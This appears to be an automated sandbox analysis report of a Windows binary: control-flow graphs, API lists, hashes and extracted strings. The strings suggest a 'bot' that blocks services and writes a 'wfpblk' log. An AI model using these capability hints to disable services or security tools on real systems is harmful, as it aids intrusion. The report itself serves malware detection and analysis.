560->553 562 7ff66eba9af8-7ff66eba9b00 560->562 562->553 564 7ff66eba9b06-7ff66eba9b09 562->564 567 7ff66eba9b59-7ff66eba9b6c 564->567 568 7ff66eba9b0b-7ff66eba9b21 564->568 565->553 566 7ff66eba9ab3-7ff66eba9af3 strncpy * 2 565->566 566->553 569 7ff66eba9b28-7ff66eba9b54 strncpy 567->569 568->569 569->553
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$strncpy$Process_errno$AllocFreefflushfopenfseekfwrite
                                                      • String ID: (path != NULL)$5$C:/Projects/rdp/bot/codebase/ini.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(path=%s)$ini_load$mem_alloc
                                                      • API String ID: 1423203057-2746879330
                                                      • Opcode ID: 6bdd63fdaf4eb0f64baa3012e1c2c8aef03f561c3c6513481c65ebd5e865db8a
                                                      • Instruction ID: faa828ce6d5de51a124fec594cc39ddae18ea977db19cf5bb6e040726d869c2e
                                                      • Opcode Fuzzy Hash: 6bdd63fdaf4eb0f64baa3012e1c2c8aef03f561c3c6513481c65ebd5e865db8a
                                                      • Instruction Fuzzy Hash: B3A1E261A4D686D2EF208B09F6807B92771EF6A784F484032FA4DCF695DE2EE545D308

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: _inittermmalloc$ExceptionFilterSleepUnhandled_amsg_exit_cexitstrlen
                                                      • String ID:
                                                      • API String ID: 3714283218-0
                                                      • Opcode ID: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                      • Instruction ID: 805b530bb25981f38050c46b51007c8da4c34e5c14b3c8cb900179b2860086bc
                                                      • Opcode Fuzzy Hash: 2813f3856443894ab469f366167a80d9e07d419bf14478a7c388344116e67307
                                                      • Instruction Fuzzy Hash: DB514E65E48A07C6EFA19B15DA9127923B0EF2EB84F484035E90DCF395DE3CE8448758

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 7ff66eba45d5-7ff66eba45f1 1 7ff66eba4687-7ff66eba46b5 call 7ff66eba14e2 0->1 2 7ff66eba45f7-7ff66eba45fa 0->2 10 7ff66eba4b39-7ff66eba4b4a 1->10 4 7ff66eba4600-7ff66eba4604 2->4 5 7ff66eba46ba-7ff66eba46e8 call 7ff66eba14e2 2->5 8 7ff66eba4610-7ff66eba4625 fopen 4->8 9 7ff66eba4606-7ff66eba460a 4->9 5->10 13 7ff66eba4720-7ff66eba4749 _errno call 7ff66eba14e2 _errno 8->13 14 7ff66eba462b-7ff66eba4640 fseek 8->14 9->8 12 7ff66eba46ed-7ff66eba471b call 7ff66eba14e2 9->12 16 7ff66eba4b53-7ff66eba4b60 10->16 17 7ff66eba4b4c 10->17 12->10 30 7ff66eba478f-7ff66eba47a3 _errno 13->30 31 7ff66eba474b-7ff66eba4758 13->31 19 7ff66eba47f3-7ff66eba4800 call 7ff66ebb04e8 14->19 20 7ff66eba4646-7ff66eba466f _errno call 7ff66eba14e2 _errno 14->20 24 7ff66eba4b62-7ff66eba4b73 call 7ff66eba14e2 16->24 25 7ff66eba4b99-7ff66eba4ba0 16->25 17->16 36 7ff66eba4802 19->36 37 7ff66eba482b-7ff66eba4854 _errno call 7ff66eba14e2 _errno 19->37 33 7ff66eba4675-7ff66eba4682 20->33 34 7ff66eba47da-7ff66eba47ee _errno 20->34 32 7ff66eba4b78-7ff66eba4b8a 24->32 25->24 35 7ff66eba4b28-7ff66eba4b2b 30->35 31->30 33->1 34->35 40 7ff66eba4b35-7ff66eba4b37 35->40 41 7ff66eba4b2d-7ff66eba4b30 fclose 35->41 38 7ff66eba4b23 36->38 39 7ff66eba4808-7ff66eba480d 36->39 51 7ff66eba4856-7ff66eba4863 37->51 52 7ff66eba489a-7ff66eba48ae _errno 37->52 38->35 43 7ff66eba48b3-7ff66eba48cb fseek 39->43 44 7ff66eba4813-7ff66eba4818 39->44 40->10 45 7ff66eba4ba2-7ff66eba4bbb call 7ff66eba14e2 40->45 41->40 47 7ff66eba4941-7ff66eba496a _errno call 7ff66eba14e2 _errno 43->47 48 7ff66eba48cd-7ff66eba48d9 43->48 44->43 50 7ff66eba481e-7ff66eba4826 44->50 45->32 63 7ff66eba49b0-7ff66eba49c4 _errno 47->63 64 7ff66eba496c-7ff66eba4979 47->64 53 7ff66eba48df-7ff66eba48e5 48->53 54 7ff66eba49c9-7ff66eba49eb GetProcessHeap HeapAlloc 48->54 50->35 51->52 52->35 58 7ff66eba4b92-7ff66eba4b97 53->58 59 7ff66eba48eb 53->59 54->53 57 7ff66eba49f1-7ff66eba4a07 call 7ff66eba14e2 54->57 57->53 58->35 62 7ff66eba48f0-7ff66eba48ff 59->62 66 7ff66eba4a9e-7ff66eba4aa7 62->66 67 7ff66eba4905-7ff66eba4907 62->67 63->35 64->63 69 7ff66eba4acf-7ff66eba4af2 call 7ff66eba14e2 66->69 70 7ff66eba4aa9-7ff66eba4aab 66->70 67->66 68 7ff66eba490d-7ff66eba4930 fread 67->68 68->66 71 7ff66eba4936 68->71 73 7ff66eba4aad-7ff66eba4ab2 69->73 72 7ff66eba4af4-7ff66eba4af9 70->72 70->73 77 7ff66eba4a0c-7ff66eba4a35 _errno call 7ff66eba14e2 _errno 71->77 78 7ff66eba493c-7ff66eba493f 71->78 75 7ff66eba4b03-7ff66eba4b0c 72->75 76 7ff66eba4afb-7ff66eba4b01 72->76 73->35 79 7ff66eba4ab4-7ff66eba4acd GetProcessHeap HeapFree 73->79 75->76 76->35 83 7ff66eba4a37-7ff66eba4a44 77->83 84 7ff66eba4a7b-7ff66eba4a8f _errno 77->84 78->62 79->35 83->84 84->62
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: _errno$fclosefflushfopenfseekfwrite
                                                      • String ID: (((*buf) == NULL) || ((*buf_sz) > 0))$(buf_sz != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> fopen failed(path=%s,errno=%d)$[E] (%s) -> fread failed(path=%s,errno=%d)$[E] (%s) -> fread undone(path=%s,l=%ld,n=%ld)$[E] (%s) -> fseek(SEEK_END) failed(path=%s,errno=%d)$[E] (%s) -> fseek(SEEK_SET) failed(path=%s,errno=%d)$[E] (%s) -> ftell failed(path=%s,errno=%d)$[I] (%s) -> Done(path=%s,buf_sz=%llu)$fs_file_read$mem_alloc
                                                      • API String ID: 2897271634-4120527733
                                                      • Opcode ID: 476736063a4b9eb5de203d0d505906ad81cf16e2f6ac8535f0a535e5f2e4fb25
                                                      • Instruction ID: 125e81b759b6bb18520e1de5a53be00d3cf0d17137e4ca15d7b53e13c872f40d
                                                      • Opcode Fuzzy Hash: 476736063a4b9eb5de203d0d505906ad81cf16e2f6ac8535f0a535e5f2e4fb25
                                                      • Instruction Fuzzy Hash: D8D19F21E48603D3EA209B59EA843B83371EF7A785F554132F90DCF2A4DE7CE9468308

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 85 7ff66eba8cfc-7ff66eba8d3f call 7ff66eba9bb9 88 7ff66eba927f 85->88 89 7ff66eba8d45-7ff66eba8d47 85->89 90 7ff66eba9284-7ff66eba9299 88->90 89->90 91 7ff66eba8d4d-7ff66eba8d59 89->91 91->90 92 7ff66eba8d5f-7ff66eba8d71 call 7ff66eba1cf4 91->92 95 7ff66eba8d91-7ff66eba8d97 92->95 96 7ff66eba8d73-7ff66eba8d7d call 7ff66eba1c73 92->96 98 7ff66eba8d9c-7ff66eba8d9e 95->98 99 7ff66eba8d82-7ff66eba8d88 96->99 100 7ff66eba8da0-7ff66eba8da3 98->100 101 7ff66eba8db7-7ff66eba8dce call 7ff66eba1c73 98->101 99->98 102 7ff66eba8d8a-7ff66eba8d8f 99->102 100->90 103 7ff66eba8da9-7ff66eba8db2 FreeLibrary 100->103 106 7ff66eba8dd4-7ff66eba8deb call 7ff66eba1c73 101->106 107 7ff66eba9257 101->107 102->100 103->90 110 7ff66eba9261 106->110 111 7ff66eba8df1-7ff66eba8e03 call 7ff66eba1c73 106->111 107->110 113 7ff66eba926b 110->113 111->113 116 7ff66eba8e09-7ff66eba8e20 call 7ff66eba1c73 111->116 115 7ff66eba9275 113->115 115->88 116->115 119 7ff66eba8e26-7ff66eba8e2c 116->119 120 7ff66eba8e76-7ff66eba8e82 119->120 120->100 121 7ff66eba8e88-7ff66eba8e8a 120->121 121->100 122 7ff66eba8e90-7ff66eba8eca call 7ff66ebaa1f1 121->122 125 7ff66eba8e72 122->125 126 7ff66eba8ecc-7ff66eba8f29 strlen 122->126 125->120 128 7ff66eba8e2e-7ff66eba8e49 call 7ff66eba14e2 126->128 129 7ff66eba8f2f-7ff66eba8f5e 126->129 128->125 133 7ff66eba8f64-7ff66eba8f8d GetProcessHeap HeapAlloc 129->133 134 7ff66eba8e4b-7ff66eba8e5e call 7ff66eba14e2 129->134 136 7ff66eba90a4-7ff66eba90c4 call 7ff66eba14e2 133->136 137 7ff66eba8f93-7ff66eba8fac 133->137 141 7ff66eba8e63-7ff66eba8e6b 134->141 136->141 143 7ff66eba8fb2-7ff66eba9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 137->143 144 7ff66eba90c9-7ff66eba90df call 7ff66eba14e2 137->144 141->125 145 7ff66eba91a9-7ff66eba91da call 7ff66eba795a 143->145 146 7ff66eba906d-7ff66eba9086 call 7ff66eba14e2 143->146 152 7ff66eba90e4-7ff66eba90ec 144->152 157 7ff66eba91ef-7ff66eba9200 call 7ff66eba14e2 145->157 158 7ff66eba91dc-7ff66eba91ea LocalFree 145->158 154 7ff66eba910e-7ff66eba9114 146->154 155 7ff66eba908c 146->155 152->141 156 7ff66eba90f2-7ff66eba9109 GetProcessHeap HeapFree 152->156 159 7ff66eba9211-7ff66eba9216 154->159 160 7ff66eba911a-7ff66eba9120 154->160 162 7ff66eba919f-7ff66eba91a4 155->162 163 7ff66eba9092-7ff66eba909f 155->163 156->141 166 7ff66eba9205 157->166 158->152 159->152 164 7ff66eba9122-7ff66eba9125 160->164 165 7ff66eba9153-7ff66eba9159 160->165 162->152 163->136 167 7ff66eba9140-7ff66eba9146 164->167 168 7ff66eba9127-7ff66eba912a 164->168 169 7ff66eba915f-7ff66eba9165 165->169 170 7ff66eba9239-7ff66eba923e 165->170 166->158 173 7ff66eba922f-7ff66eba9234 167->173 174 7ff66eba914c-7ff66eba9151 167->174 171 7ff66eba9130-7ff66eba9133 168->171 172 7ff66eba921b-7ff66eba9220 168->172 175 7ff66eba9243-7ff66eba9248 169->175 176 7ff66eba916b-7ff66eba9171 169->176 170->152 177 7ff66eba9225-7ff66eba922a 171->177 178 7ff66eba9139-7ff66eba913e 171->178 172->152 173->152 174->152 175->152 179 7ff66eba9177-7ff66eba917c 176->179 180 7ff66eba924d-7ff66eba9252 176->180 177->152 178->152 179->152 180->152
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: Heap$Free$BuildCriticalLibraryProcessSection$AddressAllocCopyDescriptorEnterFileLeaveLoadLocalProcSecurityTrusteeWithfflushfwritestrcmpstrlen
                                                      • String ID: RtlAnsiStringToUnicodeString$RtlCopyMemory$RtlCreateServiceSid$RtlFreeUnicodeString$RtlZeroMemory$[E] (%s) -> BuildSecurityDescriptorW failed(gle=%lu)$[E] (%s) -> Memory allocation failed(size=%llu)$[E] (%s) -> RtlAnsiStringToUnicodeString failed(res=%08lx)$[E] (%s) -> RtlCreateServiceSid failed(res=%08lx)$[I] (%s) -> Done(svc_name=%s)$block_svc$mem_alloc$ntdll.dll$svc
                                                      • API String ID: 3039259412-1782951725
                                                      • Opcode ID: aecca9bf93d322d8573f51c3096c9132d3b81b29e48e314583a7dc795d1e92dc
                                                      • Instruction ID: 7d2fa9d088b613819606332b056dd61cc82bee1c1f0fe1d8bca542db7cfe49af
                                                      • Opcode Fuzzy Hash: aecca9bf93d322d8573f51c3096c9132d3b81b29e48e314583a7dc795d1e92dc
                                                      • Instruction Fuzzy Hash: ECD15F21A4C783C6FF708B09F6843B96271EBAA344F504035EA4D8EA95DE7EE544D709

                                                      Control-flow Graph

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: _errno$fopenfwrite
                                                      • String ID: (mode != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                      • API String ID: 1336347884-544371937
                                                      • Opcode ID: a998415da828f98903b86042555ffa528a7441b3811dfce188ff0d53f32f1298
                                                      • Instruction ID: 3b9b4e7336268c178b7b90bdb7f7df85e300e37e8a788f12a69400397fb65f8c
                                                      • Opcode Fuzzy Hash: a998415da828f98903b86042555ffa528a7441b3811dfce188ff0d53f32f1298
                                                      • Instruction Fuzzy Hash: AD517061E48643C3FE119B59DB842B823B1EF6A794F594136F90DCF2A1EE7CE5068308

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 376 7ff66eba168c-7ff66eba16b4 InitializeCriticalSectionAndSpinCount 377 7ff66eba17e0-7ff66eba1801 GetLastError call 7ff66eba14e2 376->377 378 7ff66eba16ba-7ff66eba16ee call 7ff66eba19c0 call 7ff66eba6b9b 376->378 383 7ff66eba1803 377->383 384 7ff66eba1822-7ff66eba1828 377->384 391 7ff66eba16f4-7ff66eba170b strlen 378->391 392 7ff66eba17b9-7ff66eba17d1 call 7ff66eba14e2 378->392 389 7ff66eba18e1-7ff66eba18e6 383->389 390 7ff66eba1809-7ff66eba1816 383->390 387 7ff66eba182e-7ff66eba1834 384->387 388 7ff66eba18eb 384->388 393 7ff66eba1860-7ff66eba1863 387->393 394 7ff66eba1836-7ff66eba183c 387->394 399 7ff66eba18f5-7ff66eba18fa 388->399 389->392 390->384 395 7ff66eba1723-7ff66eba1726 391->395 396 7ff66eba170d-7ff66eba1710 391->396 408 7ff66eba17d6-7ff66eba17df 392->408 401 7ff66eba1865-7ff66eba1868 393->401 402 7ff66eba187d-7ff66eba1883 393->402 397 7ff66eba1842-7ff66eba1848 394->397 398 7ff66eba1909-7ff66eba190e 394->398 406 7ff66eba1748-7ff66eba1791 strlen fopen 395->406 407 7ff66eba1728-7ff66eba1742 strcat strlen 395->407 396->395 403 7ff66eba1712-7ff66eba171f strlen 396->403 404 7ff66eba184e-7ff66eba1854 397->404 405 7ff66eba1913-7ff66eba1918 397->405 398->392 399->392 409 7ff66eba18d7 401->409 410 7ff66eba186a-7ff66eba186d 401->410 411 7ff66eba18ff 402->411 412 7ff66eba1885-7ff66eba188a 402->412 403->395 413 7ff66eba188f-7ff66eba1894 404->413 414 7ff66eba1856-7ff66eba185b 404->414 405->392 415 7ff66eba1797-7ff66eba17b3 call 7ff66eba14e2 406->415 416 7ff66eba18ad-7ff66eba18c8 call 7ff66eba14e2 406->416 407->406 409->389 410->399 417 7ff66eba1873-7ff66eba1878 410->417 411->398 412->392 413->392 414->392 415->392 422 7ff66eba191d-7ff66eba1937 call 7ff66eba14e2 415->422 416->392 417->392 422->408
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpinfopenstrcat
                                                      • String ID: Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$log$wfpblk.l
                                                      • API String ID: 3395718042-2291025694
                                                      • Opcode ID: 49a17f5a92830ced3a36e3677e3db33b320a408802c6024068c7c2da36c633a4
                                                      • Instruction ID: efa4157b14607bd28b4500f869eaab06d9845808eeb7efff067fbf91d310e102
                                                      • Opcode Fuzzy Hash: 49a17f5a92830ced3a36e3677e3db33b320a408802c6024068c7c2da36c633a4
                                                      • Instruction Fuzzy Hash: 5E5153D0E4C603D2FAA15B48A6C03B81275EF2F744F985132E60ECE296DE2CA949C349

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 425 7ff66eba5e6f-7ff66eba5e80 426 7ff66eba5f72-7ff66eba5fa0 call 7ff66eba14e2 425->426 427 7ff66eba5e86-7ff66eba5e89 425->427 438 7ff66eba5f32-7ff66eba5f35 426->438 428 7ff66eba5e8f-7ff66eba5ed4 CreateFileA 427->428 429 7ff66eba5fa2-7ff66eba5fd0 call 7ff66eba14e2 427->429 431 7ff66eba5fd5-7ff66eba5ff9 GetLastError call 7ff66eba14e2 428->431 432 7ff66eba5eda-7ff66eba5f08 LockFileEx 428->432 429->438 446 7ff66eba6013-7ff66eba6019 431->446 447 7ff66eba5ffb 431->447 436 7ff66eba5f0e-7ff66eba5f21 432->436 437 7ff66eba60ba-7ff66eba60de GetLastError call 7ff66eba14e2 432->437 441 7ff66eba5f27-7ff66eba5f2c 436->441 442 7ff66eba622b-7ff66eba622e CloseHandle 436->442 457 7ff66eba60e0 437->457 458 7ff66eba60f8-7ff66eba60fe 437->458 443 7ff66eba5f3e-7ff66eba5f4b 438->443 444 7ff66eba5f37 438->444 441->438 448 7ff66eba6245-7ff66eba625e call 7ff66eba14e2 441->448 450 7ff66eba6239 442->450 449 7ff66eba5f51-7ff66eba5f62 call 7ff66eba14e2 443->449 443->450 444->443 454 7ff66eba601f-7ff66eba6025 446->454 455 7ff66eba61a9 446->455 452 7ff66eba6001-7ff66eba600e 447->452 453 7ff66eba60b0 447->453 465 7ff66eba5f67-7ff66eba5f71 448->465 449->465 450->448 452->446 453->437 463 7ff66eba6051-7ff66eba6054 454->463 464 7ff66eba6027-7ff66eba602d 454->464 470 7ff66eba61b3 455->470 466 7ff66eba6195 457->466 467 7ff66eba60e6-7ff66eba60f3 457->467 460 7ff66eba61ef 458->460 461 7ff66eba6104-7ff66eba610a 458->461 475 7ff66eba61f9 460->475 468 7ff66eba6143-7ff66eba6149 461->468 469 7ff66eba610c-7ff66eba610f 461->469 473 7ff66eba6072-7ff66eba6078 463->473 474 7ff66eba6056-7ff66eba6059 463->474 471 7ff66eba61d1 464->471 472 7ff66eba6033-7ff66eba6039 464->472 466->455 467->458 480 7ff66eba614f-7ff66eba6155 468->480 481 7ff66eba6217 468->481 476 7ff66eba6111-7ff66eba6114 469->476 477 7ff66eba612d-7ff66eba6133 469->477 486 7ff66eba61bd 470->486 483 7ff66eba61db 471->483 482 7ff66eba603f-7ff66eba6045 472->482 472->483 478 7ff66eba607e 473->478 479 7ff66eba61c7 473->479 474->470 484 7ff66eba605f-7ff66eba6062 474->484 494 7ff66eba6203 475->494 476->475 487 7ff66eba611a-7ff66eba611d 476->487 488 7ff66eba6139 477->488 489 7ff66eba620d 477->489 493 7ff66eba6088 478->493 479->471 490 7ff66eba6221 480->490 491 7ff66eba615b-7ff66eba6161 480->491 481->490 492 7ff66eba6047 482->492 482->493 483->460 485 7ff66eba6068 484->485 484->486 485->473 486->479 487->494 495 7ff66eba6123 487->495 488->468 489->481 490->442 496 7ff66eba6163 491->496 497 7ff66eba616d 491->497 492->463 493->453 494->489 495->477 496->497 497->466
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000006.00000002.2163033624.00007FF66EBA1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF66EBA0000, based on PE: true
                                                      • Associated: 00000006.00000002.2163021700.00007FF66EBA0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163049435.00007FF66EBB1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163063896.00007FF66EBB2000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163080682.00007FF66EBBA000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163093695.00007FF66EBBC000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000006.00000002.2163105464.00007FF66EBBF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_6_2_7ff66eba0000_f8ff311483bvmdq2bvv.jbxd
                                                      Similarity
                                                      • API ID: ErrorFileLast$CloseCreateHandleLock
                                                      • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock
                                                      • API String ID: 2747014929-530486279
                                                      • Opcode ID: 28a03d3f68afc9b5ab97c55a7cf804f003cfde781369e6ff187817ba87fd1780
                                                      • Instruction ID: 07faf046ac863ed245fa7aba0effe052faf818041356a584c2f0c4aed760ab00
                                                      • Opcode Fuzzy Hash: 28a03d3f68afc9b5ab97c55a7cf804f003cfde781369e6ff187817ba87fd1780
                                                      • Instruction Fuzzy Hash: A9813050D9D70AC3FE30974CA6803783170EF2A754F540132FA6E8E6D5EE6EAA85834D

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 571 7ff66eba9181-7ff66eba9186 572 7ff66eba90e4-7ff66eba90ec 571->572 573 7ff66eba90f2-7ff66eba9109 GetProcessHeap HeapFree 572->573 574 7ff66eba8e63-7ff66eba8e6b 572->574 573->574 575 7ff66eba8e72-7ff66eba8e82 574->575 577 7ff66eba8da0-7ff66eba8da3 575->577 578 7ff66eba8e88-7ff66eba8e8a 575->578 580 7ff66eba9284-7ff66eba9299 577->580 581 7ff66eba8da9-7ff66eba8db2 FreeLibrary 577->581 578->577 579 7ff66eba8e90-7ff66eba8eca call 7ff66ebaa1f1 578->579 579->575 584 7ff66eba8ecc-7ff66eba8f29 strlen 579->584 581->580 586 7ff66eba8e2e-7ff66eba8e49 call 7ff66eba14e2 584->586 587 7ff66eba8f2f-7ff66eba8f5e 584->587 586->575 591 7ff66eba8f64-7ff66eba8f8d GetProcessHeap HeapAlloc 587->591 592 7ff66eba8e4b-7ff66eba8e5e call 7ff66eba14e2 587->592 594 7ff66eba90a4-7ff66eba90c4 call 7ff66eba14e2 591->594 595 7ff66eba8f93-7ff66eba8fac 591->595 592->574 594->574 600 7ff66eba8fb2-7ff66eba9067 BuildTrusteeWithSidW BuildSecurityDescriptorW 595->600 601 7ff66eba90c9-7ff66eba90df call 7ff66eba14e2 595->601 602 7ff66eba91a9-7ff66eba91da call 7ff66eba795a 600->602 603 7ff66eba906d-7ff66eba9086 call 7ff66eba14e2 600->603 601->572 612 7ff66eba91ef-7ff66eba9205 call 7ff66eba14e2 602->612 613 7ff66eba91dc-7ff66eba91ea LocalFree 602->613 610 7ff66eba910e-7ff66eba9114 603->610 611 7ff66eba908c 603->611 614 7ff66eba9211-7ff66eba9216 610->614 615 7ff66eba911a-7ff66eba9120 610->615 617 7ff66eba919f-7ff66eba91a4 611->617 618 7ff66eba9092-7ff66eba909f 611->618 612->613 613->572 